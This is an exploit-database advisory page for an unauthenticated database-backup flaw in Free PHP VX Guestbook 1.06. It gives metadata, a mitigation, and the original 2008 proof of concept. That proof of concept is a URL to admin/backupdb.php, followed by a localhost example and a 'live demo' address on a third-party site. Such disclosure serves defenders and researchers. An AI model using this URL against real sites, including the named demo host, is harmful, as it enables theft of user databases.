Free PHP VX Guestbook 1.06 Arbitrary Backup Database

vendor:

Free PHP VX Guestbook

by:

SirGod

7.5

CVSS

HIGH

Arbitrary Backup Database

264

CWE

Product Name: Free PHP VX Guestbook

Affected Version From: 01.06

Affected Version To: 01.06

Patch Exists: NO

Related CWE: N/A

CPE: a:phpvx:free_php_vx_guestbook

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Free PHP VX Guestbook 1.06 Arbitrary Backup Database

An attacker can download the database of the vulnerable application by accessing the backupdb.php page. This page is accessible without authentication and allows an attacker to download the database of the vulnerable application.

Mitigation:

Authentication should be implemented for the backupdb.php page.

Source

Exploit-DB raw data:

###############################################################################################
[+] Free PHP VX Guestbook 1.06 Arbitrary Backup Database
[+] Discovered By SirGod 
[+] wWw.MorTal-TeaM.OrG                   
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke                    
################################################################################################

 [+] Arbitrary Backup Database

  Follow the example and the database download will begin :

   [dbname]_db_backup.sql

 
  PoC :

    http://[target]/[path]/admin/backupdb.php

  Example :

    http://127.0.0.1/book/admin/backupdb.php

  Live Demo :

    http://phpversion.com/book/admin/backupdb.php


################################################################################################

# milw0rm.com [2008-09-13]